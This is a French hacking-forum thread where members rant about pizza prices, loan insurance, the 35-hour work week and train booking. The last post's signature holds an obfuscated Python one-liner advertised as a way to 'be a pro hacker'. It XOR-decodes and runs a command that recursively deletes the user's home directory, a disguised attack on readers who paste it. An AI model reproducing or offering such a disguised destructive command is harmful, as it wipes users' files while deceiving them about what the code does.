Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-03-2011 19:20:09

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

On nous prend pour des cons !!!

Histoire de discuter de tout et de rien, (surtout de rien) je propose un topic ou chacun pourrait exprimer ces idées face à toutes les choses qu'il trouve injuste.

Ce topic est un défouloir, un appel au pavé, mais il doit respecter certains standards.

Pas de vulgarité (ou alors fine et suggestive smile ), pas de rascisme ou de discrimination etc etc, une réponse par sujet et toutes les réponses doivent se terminer obligatoirement par

"On nous prend pour des cons !!!".

Par souci de démocratie, tous les avis sont bons à prendre néanmoins les attaques anti bovins pourraient mener à des représailles.

Bref si quelquechose vous gonfle, vos plumes les loulous.

Dernière modification par noireaude (11-03-2011 21:42:32)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 11-03-2011 19:28:55

noireaude
Membre d'honneur
Site Web

Re : On nous prend pour des cons !!!

Je commence donc.

LES PIZZAS :

L'autre jour je commande la même pizza que d'habitude, à savoir une marguerita avec anchois.
Je me penche sur la carte quand même histoire de voir si autre chose me tente.

Je constate alors que ma marguerita avec anchois n'est autre qu'une Napolitaine sans olives.

La ou cela m'a interpellé, c'est que ma marguerita avec anchois me coûte un supplément puisque que dans sa forme sommaire elle ne contient pas les dites "anchois de la discorde".

Je prend donc mon téléphone gonflé à bloc et bien décidé à ne pas me faire arnaquer et je demande une Napolitaine sans olives.

La charmante demoiselle me corrige en me disant une marguerita avec anchois alors ?

Bien sur je la rappel à l'ordre tout de suite  "non car sinon vous allez me compter un supplément".

Elle me répond en effet qu'il y a un supplément.

je lui explique alors que cela n'est logique sachant que Marguerita avec anchois n'est autre qu'une Napolitaine sans olives.

Après un long, très long moment de réflexion (...) elle me dit qu'en effet mon choix est plus judicieux.

Je lui demande donc, ce qui parait logique si elle va me déduire le prix des olives ?

Elle a rigolé en me disant "Monsieur cela ne marche pas comme ça".

J'ai moins rigolé.

On nous arnaque jusque dans nos pizzas !!!

Dernière modification par noireaude (11-03-2011 22:43:05)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#3 11-03-2011 19:46:18

noireaude
Membre d'honneur
Site Web

Je continue.

LES ASSUREURS :

J'ai décidé dernièrement d'acheter un petit appartement après avoir économisé des années.
Je me rend donc à la banque pour obtenir un prêt.

Il y a une chose qu'il faut savoir dans ce cas, pour obtenir le dit "prêt", il faut obligatoirement prendre une assurance sur celui-ci.

Et c'est la que l'aberration commence.

Normalement en tant que consomateurs on a en théorie le droit de choisir avec quel assureur on veut négocier,.

En théorie seulement, car dans les faits la plus part des grandes banques n'accepteront de vous consentir un prêt à la seule condition que vous passiez par elles pour l'assurance de celui ci.

Il faut précisier aussi qu'ils tournent les choses de façon à ce que vous ne vous posiez même pas la question du choix de l'assureur.
La plus part des acheteurs sont tellements noyés dans les démarches que c'est un aspect qu'ils ignorent tout bonnement.
Ou alors ils tournent la chose de manière à ce que vous pensiez que c'est obligatoire de passer par votre banque.

La ou cela devient encore plus "rigolo" c'est la façon dont ces escrocs vont vous assurer.

Vous devez répondre à un questionnaire de santé, la deux choix, ou vous répondez hônêtement ou vous ne cochez que les cases qui ne vont pas vous pénaliser.

Pour la petite histoire une des question qui va engendrer un questionnaire plus poussez est "Prenez vous régulièrement des médicaments ?"

Qui va répondre non?

On prend tous de temps en temps un cachet pour la tête ou pour autre chose.

Dans les faits je signale une affection respiratoire chronique à savoir de l'asthme.
Beaucoup de Français en sont atteint et vivent leur vie tout à fait normalement.

Résultat la réponse de mon assureur est clair, il accepte de m'assurer moyenant une surprime.

Bon ... je me dit à la limitte pourquoi pas ...

La ou cela se gâte, c'est qu'il accepte de m'assurer contre une surprime, mais en lisant bien je vois qu'il assure bien le prêt, mais précise qu'il ne prendra rien en charge qui découlerait d'une affection réspiratoire et (ou) conséquences  !!!

En gros l'assureur me fait payer une surprime pour soit disant assurer un risque que dans les faits il ne prendra pas en charge .....

Il se couvre encore plus en ajoutant "Et conséquences" !!!

Le flou des ces "conséquences" laisse planer plein de soucis potentiels pouvant causer bien des  problèmes le moment venu.

Si on réfléchit un peu, il n'est pas exclu en cas d'affection d'un autre genre (cardiologique par exemple), que ce petit malin d'assureur essaie de faire passer cela pour une conséquence.

Je ne suis pas médecin mais je suppose que bien tourné c'est plausible.

Si vous refusez évidement vous n'obtenez pas de prêt, puisque pas d'assurance ...

Aujourdhui un assureur peut imposer une surprime pour un risque qu'il ne prendra pas en charge.

Ainsi au lieu de vous refuser tout bonnement  il a trouvé le moyen de se faire de la thune sur votre dos sans en assumer les risques.

Vous payez un assureur mais c'est vous qui assumez les risques. Logique.

Moralité "ETRE HONNETE NE PAIE PAS !!!!".

Les assureurs me gavent !!!

On nous prend pour des cons !!!!

Dernière modification par noireaude (11-03-2011 22:32:54)

#4 11-03-2011 20:55:37

noireaude
Membre d'honneur
Site Web

LES 35 HEURES VU DE L'INTERIEUR :

Les 35 heures sont un sujet qui me touche de près.

Pourquoi ?

On ne va pas refaire les débats pour ou contre, mais quand il y en a il y a une chose qui me peine profondément sur un sujet qui n'est jamais abordé parles "bons" penseurs de notre société.

Je vais commencer par un petit rappel les 35 heures c'était dans la forme, travailler moins sans perte de salaire ce qui en théorie crée de l'emploi.

Un piètre résumé mais c'est ce que chacun d'entre nous en a retenu.

Je vais expliquer dans les faits ce qu'on été pour moi les 35 heures.

Le constat est simple mais dévastateur, quand les 35 heures sont apparus, les petites et moyennes entreprises on quasiment toutes adoptés un sytème dit de modulation. (En accord avec les principaux syndicats)

Qu'est ce que la modulation ?

Dans les faits la modlation est l'annualistion du temps de travail, c'est a dire que vous allez avoir un nombre d'heures à faire en une année.
La modulation permet à votre employeur de distribuer les heures de travail comme bon lui semble.

Je vais prendre mon cas, je suis en modulation 48, ce qui veut dire que mon employeur peut me faire travailler 48 heures par semaine sans me verser ni les heures supplémentaires ni même les heures effectués en plus dans le mois.

Sa seul obligation si l ne veut pas payer plus d'heures est de réguler, sachant qu'il a toute l'année pour le faire ce qui lui laisse plu de temps qu'il ne lui en faut.
Bien entendu votre salaire lui ne bouge pas, il n'y a que votre employeur qui y gagne, il n'a pas d'heures supp à payer et peut adapter la charge de travail des ces employés en fonction des flux d'activité. Bref tout benef.
De plus la régulation est si elle est bien faite vous ne la remarquez même pas, un jour par ci, une demie journée par la et quand bien même voula sentiriez vous n'en profiteriez pas car ous seriez de toue façon à la dèche.

Voyons maintenant quelques aspects dégueulasse de ce système de modulation.

Je travail sur des plages horaires variables qui incluent des nuits (heures de nuits donc majorées).

Mon employeur me demande un service à savoir travailler une journée de 12 heures (dans mon secteur 12 heures de taff c'est courant).
J'accepte et je vais bosser, mon employeur régule en me supprimant un service de nuit de 12 heures.

Bilan j'ai perdu de l'argent, en allant bosser 12 heures de jour je n'ai rien gagné et pire m'ayant enlevé une nuit à la place j'ai perdu la majoration des heures qui allaient avec.

Moralité, je refuse de rendre service à mon employeur car je perd de l'argent sinon.

Autre cas de figure : Je travail plus de 48 heures par semaine, je suis content car je vais toucher des heures supp smile !!!

Ben non, car mon patron n'est pas con, il va faire en sorte que la 48ème heure tombe sur un service de week-end.

Bilan votre 48 ème heure tombe le Lundi matin à 00H00, il vous reste encore 6 à 8 heures à faire mais qui vont être pris en compte sur la nouvelle semaine en cours ....

Moralité je me fais entuber.

Dernier cas de figure : Les 35 heures et la création d'emplois.

Vous avez compris que je peux pas travailler plus chez mon employeur depuis les 35 heures, car d'une je perdrais de l'argent et de deux il ne me laisserait pas faire de toute façon.

Alors je vais être obligé de trouver un deuxième emploi si je veux gagner plus.

Bilan je vole un emploi à quelqu'un d'autre qui n'en a pas et  mon patron va être obligé d'embaucher un employé pour effecuter les heures qu'il ne veut (peut) pas me donner.

C'est abérant sachant que j'ai piqué un emploi à quelqu'un, mais on peut me dire oui mais un emploi à quand même été crée dans mon entreprise.

Oui c'est vrai, mais cela n'est pas un emploi à temp plein, ni un CDI et cet emploi disparait d'office en période creuse.

D'ailleurs les patrons vont souvent régler le problème en ayant allègrement recours à des stagiaires non rémunérés, ce qui dans ce cas coûte un emploi à une personne et n'en créé aucun.

L'autre solution qu'ils mettent en oeuvre c'est de tout bonnement répartir la charge de travail sur les autre salariés, qui ne peuvent quasiment plus suivre.

Cette méthode est le terreau de sucicdes en entreprises, les plus sensibles vont craquer sous la pression des politiques de rendement maximum.

MERVEILLEUX NON ?

Moralité si je pouvais effectuer le heures supp chez mon patron, l'équivalent d'un temp plein serait disponible pour un autre.

Alors oui des emplois sont crées parfois (pas toujours on l'a vu).
Quand c'est le cas en général, cela reste des emplois précaires, et le gens ayant un emploi fixe dans ce système sont condamnés à un gel des salaires à vie.

LES 35 HEURES associés aux systèmes de MODULATIONS, c'est la précarisation de l'emploi dans les pme et les pmi (ca vient aussi dans les grandes entreprises et la fonction publique petit à petit).
C'est aussi la déshumanisation des travailleurs d'une manière plus général.

Le slogan de notre Bozo travailler plus pour gagner plus est allé se perdre quelque part D M C. Comme d'hab ...

Mon c..l d'ailleurs, a toujours été vaillant, mais je ne vous cache pas qu'en ce moment il commence à avoir peu de sortir son slip smile

e n'ai jamais autant travaillé que depuis les 35 heures pour gagner aussi peu ......

Le comble est de voir encore des gens débattre des 35 heures alors même que dans les faits, les 35 heures n'on jamais été une réalité pour la grande majorité des travailleurs.

Merci Martine, merci Bozo et merci à nos syndicalistes qui ont adoptés ces textes à grand coups de tapes dans le dos des patrons et des gros actionnaires.

Vous avez tués les pme, les pmi (les plus gros délocalisent de toute façon) et la qualité de l'emploi, VOUS NE SERVEZ A RIEN !!!!

On nous prend pour des con !!!

Dernière modification par noireaude (11-03-2011 21:59:34)

#5 11-03-2011 21:35:03

koala
Membre d'honneur
Lieu : In the sky

Il n'y a plus qu'a élaborer les 10 commandements pour ne plus se faire prendre pour des cons maintenant alors lol

#6 11-03-2011 21:38:48

noireaude
Membre d'honneur
Site Web

koala a écrit :

Il n'y a plus qu'a élaborer les 10 commandements pour ne plus se faire prendre pour des cons maintenant alors lol

10 ne suffiraient plus smile

#7 11-03-2011 21:46:43

koala
Membre d'honneur
Lieu : In the sky

C'est vrai remarque smile

#8 13-03-2011 20:17:09

spawn
Modérateur

"Sujet: 'on nous prend pour des cons !!!' "
- Tiens, ca doit être la Noiraude qui se lance dans les travaux publics ca !
"Par : Noiraude "
- Ah oui !

Bonjour à tous !

Vous devez connaître la SNCF.
Je n'ai pas las dates exactes en tête, mais c'était cet été.
Par trois fois j'ai du (pour des raisons TRES importantes à l'age ou l'on est pas sérieux...) traverser la France.

Je ne sais pas qui a codé le moteur de calcul d'itinéraires de notre belle et chère SNCF, mais :
-soit il avait bu (quoique.. on peut être très productif ivre)
-soit il a codé avec ses pieds (pour reprendre une blague sur Gnome)
-soit il était aux ordres d'un responsable business

Personnellement, je vote pour la troisieme option.
Pour faire Lyon-bordeaux, par exemple.

(je vous passe le temps d'attente dans la file)

Le SEUL trajet trouvé au guichet était un TGV passant par paris, super cher.
N'ayant pas envie de payer un max, je me connecte (légalement, dans un hôtel. eh oui !) et je tente de faire "à la main" le même trajet en ligne plus ou moins droite par le TER.

30€ de moins. Deux heures de plus. Le trajet EXISTE.

Bref, si vous croisez un nain ivre avec des grands pieds et une Rolex, brûlez le de ma ma part !

On nous prend pour des vaches à lait !!!   wink

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]